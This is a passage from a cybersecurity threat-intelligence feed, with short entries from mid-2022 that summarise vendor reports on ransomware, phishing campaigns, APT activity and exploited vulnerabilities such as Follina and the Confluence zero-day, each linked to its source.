Impact:: LOW

Summary:: CERT-UA has analysed an phishing email targeting media organizations of Ukraine which has the topic "LIST of links to interactive maps" and a document attached with same name. The malicious document is delivering malicious CrescentImp malware. CERT-UA has tracked this activity with medium confidence to UAC-0113, which is associated with the Sandworm Group.

Source: https://cert.gov.ua/article/160530

Intel Source:: Checkpoint

Intel Name:: Crypto_Miners_Leveraging_Atlassian_Zero_Day_Vulnerability

Date of Scan:: 2022-06-13

Impact:: MEDIUM

Summary:: Checkpoint Labs has uncovered an unauthenticated attacker who can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.

Source: https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/

Intel Source:: Palo Alto

Intel Name:: HelloXD_ransomware_and_links_with_x4k_threat_actor

Date of Scan:: 2022-06-13

Impact:: LOW

Summary:: Researchers from PaloAlto noticed in increased activity of Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption.

Source: https://unit42.paloaltonetworks.com/helloxd-ransomware/

Intel Source:: Malwarebytes

Intel Name:: Credit_card_skimmer_evades_Virtual_Machines

Date of Scan:: 2022-06-10

Impact:: LOW

Summary:: In this blog post Malwarebyres Labs show how a Magecart threat actor distributing a digital skimmer is avoiding researchers and possibly sandboxes by ensuring users are running genuine computers and not virtual ones

Source: https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/

Intel Source:: BlackBerry

Intel Name:: Symbiote_malware_detected_in_Linux

Date of Scan:: 2022-06-10

Impact:: LOW

Summary:: Researchers have identified the Symbiote malware with an impact to harvest credentials and providing remote access for the threat actor.

Source: https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat

Intel Source:: ZScaler

Intel Name:: Lyceum_NET_DNS_Backdoor

Date of Scan:: 2022-06-10

Impact:: MEDIUM

Summary:: The Iranian Lycaeum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors

Source: https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor

Intel Source:: Malwarebytes

Intel Name:: Malvertising_campaign_leads_to_fake_Firefox_update

Date of Scan:: 2022-06-09

Impact:: LOW

Summary:: Researchers from MalwareBytes came across a malvertising campaign leading to a fake Firefox update.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/

Intel Source:: ISC.SANS HelpNet Security

Intel Name:: TA570_exploiting_Follina_to_deliver_Qbot_Malware

Date of Scan:: 2022-06-09

Impact:: MEDIUM

Summary:: Researchers at ISC.SANS and HelpNet has identified a malicious DLL files used for Qakbot infections contain a tag indicating their specific distribution channel. This wave of malicious spam ultimately provided two separate methods of Qakbot infection. The first method is one also used by other threat actors, where a disk image contains a Windows shortcut that runs a malicious hidden DLL. The second method is a Word docx file using a CVE-2022-30190 (Follina) exploit.

Source: https://isc.sans.edu/diary/rss/28728 https://www.helpnetsecurity.com/2022/06/08/qbot-follina-exploit/

Intel Source:: The Hacker News

Intel Name:: State_Backed_Hackers_Exploit_Microsoft _Follina'_Bug_to_Target_Entities_in_Europe_and_U.S

Date of Scan:: 2022-06-09

Impact:: MEDIUM

Summary:: A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S.

Source: https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html

Intel Source:: Lacework blog

Intel Name:: Kinsing_&_Dark_IoT_botnet_among_threats_targeting_CVE_2022_26134

Date of Scan:: 2022-06-09

Impact:: MEDIUM

Summary:: Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022 with Lacework seeing multiple attacks in the wild from both uncategorized and named threats. As of yesterday Lacework have observed active exploitation by known Cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet and provides a current inventory of top threats seen exploiting this latest Confluence vulnerability.

Source: https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

Intel Source:: SentinelOne

Intel Name:: Aoqin_Dragon_Chinese_linked_APT_spying_for_10 years

Date of Scan:: 2022-06-09

Impact:: MEDIUM

Summary:: SentinelLabs has uncovered a cluster of activity primarily targeting organizations in Southeast Asia and Australia. The threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. This activity ttracked as ‘Aoqin Dragon’. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.

Source: https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Intel Source:: HP Wolf Security

Intel Name:: Spam_Campaign_targeting_victims_with_SVCReady_Malware

Date of Scan:: 2022-06-08

Impact:: MEDIUM

Summary:: Researchers at HP Wolf Security has identified new malicious spam campaigns spreading a previously unknown malware family called 'SVCReady'. The malware is notable for the unusual way it is delivered to target PCs using shellcode hidden in the properties of Microsoft Office documents.

Source: https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

Intel Source:: Trend Micro

Intel Name:: Cuba_Ransomware_Group_new_variant

Date of Scan:: 2022-06-08

Impact:: LOW

Summary:: Researchers at Trend Micro identified that the malware authors seem to be pushing some updates to the current binary of a new variant.

Source: https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html

Intel Source:: Qi Anxin Threat Intelligence Center

Intel Name:: Operation_Tejas

Date of Scan:: 2022-06-08

Impact:: LOW

Summary:: Qi Anxin Threat Intelligence Center once published the article "Operation Magichm: A Brief Talk on the Manlinghua Organization's CHM File Delivery and Follow-up Operations" in 2021 . In addition to the new attack methods and samples used in the latest attack in April, this Intel Center also provides an overview of the recent phishing activities of the Maya Elephant (APT-Q-41) and the basics of the Diamondback (APT-Q-39) this year.

Source: https://mp-weixin-qq-com.translate.goog/s/8j_rHA7gdMxY1_X8alj8Zg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en

Intel Source:: NCC Group

Intel Name:: Black_Basta_Ransomware_leverage_QBot_for_lateral_movement

Date of Scan:: 2022-06-08

Impact:: MEDIUM

Summary:: Researchers at NCC Group spotted a new partnership between the Black Basta ransomware group and the QBot malware operation.

Source: https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

Intel Source:: Cyble blog

Intel Name:: Bumblebee_Loader_on_the_rise

Date of Scan:: 2022-06-08

Impact:: MEDIUM

Summary:: In March 2022, a new malware named “Bumblebee” was discovered and reportedly distributed via spam campaigns. Researchers identified that Bumblebee is a replacement for BazarLoader malware, which has delivered Conti Ransomware in the past. Bumblebee acts as a downloader and delivers known attack frameworks and open-source tools such as Cobalt Strike, Shellcode, Sliver, Meterpreter. Plus downloads other types of malware such as ransomware, trojans, etc. Cyble intelligence indicates that the incidents of Bumblebee infection are on the rise.

Source: https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

Intel Source:: Avast

Intel Name:: Fake_cracked_software_spreading_Crypto_Stealing_malware

Date of Scan:: 2022-06-08

Impact:: LOW

Summary:: Users who download cracked software risk sensitive personal data being stolen by hackers.

Source: https://blog.avast.com/fakecrack-campaign

Intel Source:: ISC.SANS

Intel Name:: Spam_Email_Contains_BitRat_Malware

Date of Scan:: 2022-06-07

Impact:: LOW

Summary:: Researchers at ISC.SANS has analysed a Zipped Email attachment which contains a very large ISO/EXE file, after executing the file in sandbox. It started communicating with BitRat C2 site.

Source: https://isc.sans.edu/diary/rss/28712

Intel Source:: NCC Group

Intel Name:: Black_Basta_Ransomware_targeting_ESXi_servers

Date of Scan:: 2022-06-07

Impact:: MEDIUM

Summary:: Black Basta is the latest ransomware gang to add support for encrypting VMware ESXi virtual machines (VMs) running on enterprise Linux servers.

Source: https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

Intel Source:: SentinelOne

Intel Name:: Mindware_Ransomware

Date of Scan:: 2022-06-07

Impact:: MEDIUM

Summary:: Researchers at SentinelOne has analysed Mindware Ransomware and its similarities with SFile Ransomware, and provided technical indicators.

Source: https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/

Intel Source:: DFIR Report

Intel Name:: Exploitation_of_ManageEngine_SupportCenter_Plus

Date of Scan:: 2022-06-07

Impact:: LOW

Summary:: DFIR observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus. The threat actor, discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP and exfiltrated sensitive information using the web shell and RDP.

Source: https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/

Intel Source:: Cadosecurity

Intel Name:: WatchDog_Evolves_With_a_New_Multi-Stage_Cryptojacking_Attack

Date of Scan:: 2022-06-07

Impact:: MEDIUM

Summary:: Cado Labs’ honeypot infrastructure was recently compromised by a complex and multi-stage cryptojacking attack

Source: https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/

Intel Source:: Palo Alto

Intel Name:: Popping_Eagle_Malware

Date of Scan:: 2022-06-07

Impact:: MEDIUM

Summary:: Researchers at Palo Alto has identified an unknown piece of malware dubbed as Popping Eagle, its activity includes performing a specially crafted DLL hijacking attack. Researchers also observed the attacker following DLL hijacking by performing several network scans and lateral movement steps.

Source: https://unit42.paloaltonetworks.com/popping-eagle-malware/

Intel Source:: SecureList

Intel Name:: WinDealer_malware_shows_extremely_sophisticated_network_abilities

Date of Scan:: 2022-06-06

Impact:: LOW

Summary:: Researchers have discovered that the malware known as WinDealer, spread by Chinese-speaking Advanced Persistent Threat (APT) actor LuoYu, has the ability to perform intrusions through a man-on-the-side attack.

Source: https://securelist.com/windealer-dealing-on-the-side/105946/

Intel Source:: Trend Micro

Intel Name:: YourCyanide_Ransomware_Propagates_With_PasteBin_Discord_Microsoft_Links

Date of Scan:: 2022-06-06

Impact:: LOW

Summary:: The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.

Source: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html

Intel Source:: Trend Micro

Intel Name:: DeadBolt_Ransomware

Date of Scan:: 2022-06-06

Impact:: MEDIUM

Summary:: The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices.

Source: https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html

Intel Source:: NetSkope

Intel Name:: Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware

Date of Scan:: 2022-06-06

Impact:: MEDIUM

Summary:: Researchers at Netskope Threat Labs has analysed few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, which is a red team tool that can be used to simulate real ransomware attacks.

Source: https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs

Intel Source:: Symantec

Intel Name:: Clipminer_Botnet

Date of Scan:: 2022-06-06

Impact:: LOW

Summary:: Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clipminer-bitcoin-mining-hijacking

Intel Source:: Fortinet

Intel Name:: Travel_Themed_attacks_surges_by_multiple_RATs

Date of Scan:: 2022-06-06

Impact:: MEDIUM

Summary:: Multiple rat campaigns have been noted by researchers from Fortinet who are using travel themed lure to targets travel seekers victims. Those rats include Asyncrat, Netwire Rat, Quasar RAT.

Source: https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers

Intel Source:: NetSkope

Intel Name:: Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware

Date of Scan:: 2022-06-06

Impact:: MEDIUM

Summary:: Researchers at Netskope Threat Labs has analysed few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, which is a red team tool that can be used to simulate real ransomware attacks.

Source: https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs

Intel Source:: Sucuri

Intel Name:: Massive_NDSW_NDSX_Malware_Campaign

Date of Scan:: 2022-06-05

Impact:: MEDIUM

Summary:: Researchers at Sucuri has been tracking a campaign since Feb 2019, which they name as ndsw/ndsx malware campaign. The malware consists of several layers: the first of which prominently features the ndsw variable within JavaScript injections, the second of which leverages the ndsx variable in the payload.

Source: https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html

Intel Source:: Jstnk

Intel Name:: AsyncRAT_targeting_Colombian_Organisations

Date of Scan:: 2022-06-03

Impact:: LOW

Summary:: Researcher Jose Luis Sánchez Martínez have analysed campaigns related to AsyncRAT targeting Colombia, where there are some modifications in TTPs.

Source: https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/#summary

Intel Source:: Volexity

Intel Name:: Zero_Day_Exploitation_of_Atlassian_Confluence

Date of Scan:: 2022-06-03

Impact:: HIGH

Summary:: Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.

Source: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/indicators.csv https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Intel Source:: Microsoft

Intel Name:: POLONIUM_targeting_Israeli_organizations

Date of Scan:: 2022-06-03

Impact:: LOW

Summary:: POLONIUM has targeted and may compromised more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months.

Source: https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

Intel Source:: Mandiant

Intel Name:: UNC216_ Shifts_to_LOCKBIT_to_Evade_Sanctions

Date of Scan:: 2022-06-03

Impact:: MEDIUM

Summary:: Mandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat cluster that shares numerous overlaps with the threat group publicly reported as "Evil Corp.

Source: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

Intel Source:: CERT-UA

Intel Name:: Cobalt_Strike_Beacon_and_other_vulnerabilities_leveraged_to_target_Ukraine_government_bodies

Date of Scan:: 2022-06-03

Impact:: LOW

Summary:: CERT-UA has analysed an phishing email targeting Ukraine government bodies, it contains a file named "changes in wages with accruals.docx". The file contains a link to HTML external object, the execution of which, after exploiting vulnerabilities CVE-2021-40444 and CVE-2022-30190 and later damage the system with Cobalt Strike.

Source: https://cert.gov.ua/article/40559

Intel Source:: ISC.SANS Cisco Talos Recorded Future Fortinet

Intel Name:: Follina_zero-day_vulnerability_in_Microsoft_Office_getting_exploited

Date of Scan:: 2022-06-02

Impact:: HIGH

Summary:: A recently discovered zero-day vulnerability CVE-2022-30190 in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. It is also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. The vulnerability has been widely exploited in the wild by threat actors and some of them have been attributed to Chinese threat actor.

Source: https://isc.sans.edu/forums/diary/First+Exploitation+of+Follina+Seen+in+the+Wild/28698/ https://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html https://github.com/rl0hani/Multiple-Chinese-State-sponsored-Activity-Groups-likely-exploiting-MSDT-Follina-0-Day https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day

Intel Source:: Zscaler

Intel Name:: BITB_attack_impersonating_Indian_government_website

Date of Scan:: 2022-06-02

Impact:: LOW

Summary:: Zscaler ThreatLabz team recently observed a new Browser-in-the Browser (BITB) attack impersonating an Indian government website to deliver a sextortion demand with the threat of releasing sensitive information about victims if they refuse to pay.

Source: https://www.zscaler.com/blogs/security-research/browser-browser-sextortion-scam-makes-victims-pay-imitating-indian-gov

Intel Source:: ASEC

Intel Name:: NSIS_Installer_Malware_Included_with_Various_Malicious_Files

Date of Scan:: 2022-06-02

Impact:: LOW

Summary:: The ASEC analysis team recently discovered attackers distributing multiple malicious files with NSIS installers.

Source: https://asec.ahnlab.com/en/34955/

Intel Source:: Cyfirma

Intel Name:: Yashma_Ransomware_Report_CYFIRMA

Date of Scan:: 2022-06-02

Impact:: MEDIUM

Summary:: Yashma is a new ransomware seen in the wild since May 2022. This ransomware is the rebranded version of an earlier ransomware named Chaos.

Source: https://www.cyfirma.com/outofband/yashma-ransomware-report/

Intel Source:: CISA

Intel Name:: Karakurt_Data_Extortion_Group

Date of Scan:: 2022-06-01

Impact:: MEDIUM

Summary:: Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.

Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf

Intel Source:: AT&T Alien Labs

Intel Name:: EnemyBot_targeting_Content_Management_System_servers_and_Android_devices

Date of Scan:: 2022-05-31

Impact:: MEDIUM

Summary:: Researchers at AT&T Alien Labs has identified that EnemyBot is expanding its capabilities, exploiting vulnerabilities of 2022, and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.

Source: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

Intel Source:: Cyble

Intel Name:: CVE_2022_30190_Microsoft_Support_Diagnostic_Tool_(MSDT)_RCE_Vulnerability

Date of Scan:: 2022-05-31

Impact:: MEDIUM

Summary:: Recently, Microsoft discussed a new Zero-Day vulnerability (CVE-2022-30190) that affects Microsoft Support Diagnostic Tool (MSDT) and allows the attackers to execute arbitrary code by exploiting it.

Source: https://blog.cyble.com/2022/05/31/new-zero-day-exploit-spotted-in-the-wild/

Intel Source:: Checkpoint

Intel Name:: XLoader_Botnet_new_C&C_Infrastructure

Date of Scan:: 2022-05-31

Impact:: MEDIUM

Summary:: Researchers at Checkpoint Research has identified the real C&C servers among thousands of legitimate domains used by Xloader Botnet.

Source: https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/

Intel Source:: Trend Micro

Intel Name:: WSO2_Vulnerability_exploited_to_install_Linux_compatible_CobaltStrike_Beacons

Date of Scan:: 2022-05-31

Impact:: MEDIUM

Summary:: Researchers at TrendMicro has observed attackers are exploiting WSO2 vulnerability and intiating a outbound connection with malicious Cobalt Strike callback destination and command and control (C&C) server ipaddress.

Source: https://www.trendmicro.com/en_us/research/22/e/patch-your-wso2-cve-2022-29464-exploited-to-install-linux-compatible-cobalt-strike-beacons-other-malware.html

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APTC53_or_Gamaredon_new_DDoS_Attack_mission

Date of Scan:: 2022-05-31

Impact:: MEDIUM

Summary:: 360 Security Brain has detected more frequent network attacks related to the APT-C-53/Gamaredon Group. The Group began to release the open source DDoS Trojan program " LOIC " to carry out DDoS attacks.

Source: https://mp.weixin.qq.com/s/gJFSlpIlbaI11lcClNN_Xw

Intel Source:: Fortinet

Intel Name:: Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC_Part_II

Date of Scan:: 2022-05-30

Impact:: MEDIUM

Summary:: Researchers at Fortinet's FortiGaurd Labs has shared part-2 of the analysis where a phishing campaign delivering three fileless malware onto a victim’s device. Once executed, Malware are able to steal sensitive information from that device. It is majorly affecting Microsoft Windows platform users.

Source: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware-part-two

Intel Source:: ASEC

Intel Name:: XXL_Malware_distributed_through_Email

Date of Scan:: 2022-05-30

Impact:: LOW

Summary:: XXL Malware distributed through Email

Source: https://asec.ahnlab.com/en/34756/

Intel Source:: 360 Total Security

Intel Name:: Magniber_ransomware_targeting_Windows11_users

Date of Scan:: 2022-05-28

Impact:: MEDIUM

Summary:: Researchers at 360 Total Security has detected a new attack on Windows11 users, where Magniber ransomware disguised as a Windows 10 upgrade patch package and spread widely.

Source: https://blog.360totalsecurity.com/en/win11-users-beware-magniber-ransomware-has-been-upgraded-again-aiming-at-win11/?web_view=true

Intel Source:: CloudSEK

Intel Name:: GoodWill_Ransomware

Date of Scan:: 2022-05-27

Impact:: MEDIUM

Summary:: Researchers at CloudSEK has analysed GoodWill ransomware group activity, which forces victims to donate to the poor and provides financial assistance to patients in need.

Source: https://cloudsek.com/threatintelligence/goodwill-ransomware-forces-victims-to-donate-to-the-poor-and-provides-financial-assistance-to-patients-in-need/

Intel Source:: IBM Security X-Force

Intel Name:: Analysis_of_Black_Basta_Ransomware

Date of Scan:: 2022-05-27

Impact:: MEDIUM

Summary:: Researchers from IBM documented technical analysis of Black Basta ransomware and provided with IoC. Black Basta first appeared in April 2022.

Source: https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/

Intel Source:: Trustwave

Intel Name:: Grandoreiro_Banking_Malware

Date of Scan:: 2022-05-27

Impact:: MEDIUM

Summary:: Researchers from Trustwave SpiderLabs have identified Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in target countries by sending out tax-themed phishing emails.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season/

Intel Source:: Inquest

Intel Name:: Tandem_Espionage_Campaign

Date of Scan:: 2022-05-27

Impact:: LOW

Summary:: Researcher Dmitry Melikov at Inquest has discovered an interesting campaign distributing malicious documents. Which used the download chain as well as legitimate payload hosting services.

Source: https://inquest.net/blog/2022/05/25/tandem-espionage

Intel Source:: Sekoia

Intel Name:: TURLA_new_phishing_based_reconnaissance_campaign

Date of Scan:: 2022-05-26

Impact:: LOW

Summary:: Sekoia Threat & Detection Team have exposed a reconnaissance and espionage campaign from the Turla intrusion set against the Baltic Defense College, the Austrian Economic Chamber which has a role in government decision-making such as economic sanctions and NATO’s eLearning platform JDAL pointing Russian Intelligence interest for defense sector in Eastern Europe.

Source: https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/

Intel Source:: XJunior

Intel Name:: Deep_Analysis_on_new_version_of_Mars_Stealer_Malware

Date of Scan:: 2022-05-26

Impact:: LOW

Summary:: Security Researcher Mohamed Ashraf has analysed a new version (V8) of Mars Stealer Malware. Researchers has identified anti-analysis technique, diffrent encryption algoithm, new anti debug technique, external dlls are in one zip file

Source: https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs

Intel Source:: CrowdStrike

Intel Name:: Mirai_malware_variants_doubled_for_Intel_powered_Linux_systems

Date of Scan:: 2022-05-26

Impact:: MEDIUM

Summary:: Crowdstrike research said, Mirai malware variants compiled for Intel-powered Linux systems double (101%) in Q1 2022 compared to Q1 2021.

Source: https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/

Intel Source:: TeamCymru

Intel Name:: Threat_actors_using_Browser_automation_framework

Date of Scan:: 2022-05-26

Impact:: LOW

Summary:: Researchers from Team Cymru have noticed and alerted about a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns.

Source: https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

Intel Source:: WalMart

Intel Name:: SocGholish_Campaigns_and_Initial_Access_Kit

Date of Scan:: 2022-05-26

Impact:: MEDIUM

Summary:: Researchers from WalMart found that SocGholish have been one of the prominent Initial Access vector for threat actors and have also partnered with Evil Corp.

Source: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

Intel Source:: XJunior

Intel Name:: Deep_Analysis_on_new_version_of_Mars_Stealer_Malware

Date of Scan:: 2022-05-26

Impact:: LOW

Summary:: Security Researcher Mohamed Ashraf has analysed a new version (V8) of Mars Stealer Malware. Researchers has identified anti-analysis technique, diffrent encryption algoithm, new anti debug technique, external dlls are in one zip file

Source: https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs

Intel Source:: Fortinet

Intel Name:: Spoofed_Purchase_Order_drops_GuLoader_Malware

Date of Scan:: 2022-05-25

Impact:: MEDIUM

Summary:: Researchers at Fortinet has analysed a phishing email purporting to be a purchase order by an oil provider in Saudi Arabia, the partial PDF file image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained an executable for GuLoader.

Source: https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader

Intel Source:: Malwarebytes

Intel Name:: Unknown_APT_group_targeted_Russia_repeatedly

Date of Scan:: 2022-05-25

Impact:: Low

Summary:: Researchers from MalwareBytes Threat Intelligence Team discovered campaigns by unknown threat actors targeting Russia. The APT group has launched at least four campaigns since late February.

Source: https://blog.malwarebytes.com/malwarebytes-news/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/

Intel Source:: Fortinet

Intel Name:: New_variant_of_Nokoyawa_Ransomware

Date of Scan:: 2022-05-25

Impact:: Medium

Summary:: Researchers at Fortinet has discovered Nokoyawa Ransomware is a new variant of the Nemty ransomware that has been improving itself.

Source: https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up

Intel Source:: BlackBerry

Intel Name:: Yashma_Latest_version_of_Chaos_Ransomware

Date of Scan:: 2022-05-25

Impact:: Medium

Summary:: BlackBerry research and intelligence team have discovered details of the latest version of the Chaos ransomware line, dubbed Yashma. Though Chaos ransomware builder has only been in the wild for a year Yashma claims to be the sixth version (v6.0) of this malware.

Source: https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree

Intel Source:: Microsoft

Intel Name:: Web_Skimmers_mimicking_Google_Analytics_and_Meta_Pixel_Code

Date of Scan:: 2022-05-25

Impact:: MEDIUM

Summary:: Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection.

Source: https://www.microsoft.com/security/blog/2022/05/23/beneath-the-surface-uncovering-the-shift-in-web-skimming/#ioc

Intel Source:: Cyble

Intel Name:: Threat_Actor_leverage_Fake_Proof_Of_Concept_to_deliver_CobaltStrike

Date of Scan:: 2022-05-25

Impact:: LOW

Summary:: A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.

Source: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/

Intel Source:: HP Wolf Security

Intel Name:: PDF_delivering_Snake_Keylogger_Malware

Date of Scan:: 2022-05-24

Impact:: Medium

Summary:: HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.

Source: https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#

Intel Source:: Sonatype

Intel Name:: New_pymafka_malicious_package_drops_CobaltStrike_on_macOS_Windows_Linux

Date of Scan:: 2022-05-24

Impact:: Low

Summary:: Sonatype's automated malware detection bots have discovered malicious Python package 'pymafka' in the PyPI registry. PyMafka drops Cobalt Strike on Windows, macOS . The package, 'pymafka' may sound identical to the popular PyKafka. The package appears to typosquat a legitimate popular library PyKafka, a programmer-friendly Apache Kafka client for Python.

Source: https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux

Intel Source:: Confense

Intel Name:: Hackers_utilize_SwissTransfer_to_deploy_Phishing_Scam

Date of Scan:: 2022-05-24

Impact:: Low

Summary:: Recently the Cofense Phishing Defence Center noticed a number of emails utilising the SwissTransfer service to achieve successful phishes against recipients. An attack vector is file sharing services such as WeTransfer, Microsoft OneDrive and Dropbox have been utilized to spread files containing anything from scams to malware leading to ransomware.

Source: https://cofense.com/blog/hackers-utilize-swisstransfer-to-deploy-phishing-scam

Intel Source:: HP Wolf Security

Intel Name:: PDF_delivering_Snake_Keylogger_Malware

Date of Scan:: 2022-05-24

Impact:: Medium

Summary:: HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.

Source: https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#

Intel Source:: Checkpoint

Intel Name:: Twisted_Panda_Espionage_Operation

Date of Scan:: 2022-05-24

Impact:: Medium

Summary:: Check Point Research team have details a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes, part of the Rostec Corporation. The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months.

Source: https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/

Intel Source:: ASEC

Intel Name:: Emotet getting distributed through Link Files

Date of Scan:: 2022-05-23

Impact:: Low

Summary:: ASEC researchers recently discovered Emotet getting distributed through various files including Link Files.

Source: https://asec.ahnlab.com/en/34556/

Intel Source:: Zscaler

Intel Name:: Vidar_Malware_distributed_through_fake_Windows11_downloads

Date of Scan:: 2022-05-23

Impact:: Low

Summary:: Researchers from Zscalers came across fraudulent domains masquerading as Microsoft's Windows 11 download portal which are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.

Source: https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing

Intel Source:: Microsoft

Intel Name:: XorDdos_targeting_Linux_devices

Date of Scan:: 2022-05-23

Impact:: Medium

Summary:: Microsoft researchers saw and 254% increase in activity of a stealthy and modular malware which is used to hack into Linux devices and build a DDoS botnet. The malware is called XorDDoS.

Source: https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

Intel Source:: SentinelOne

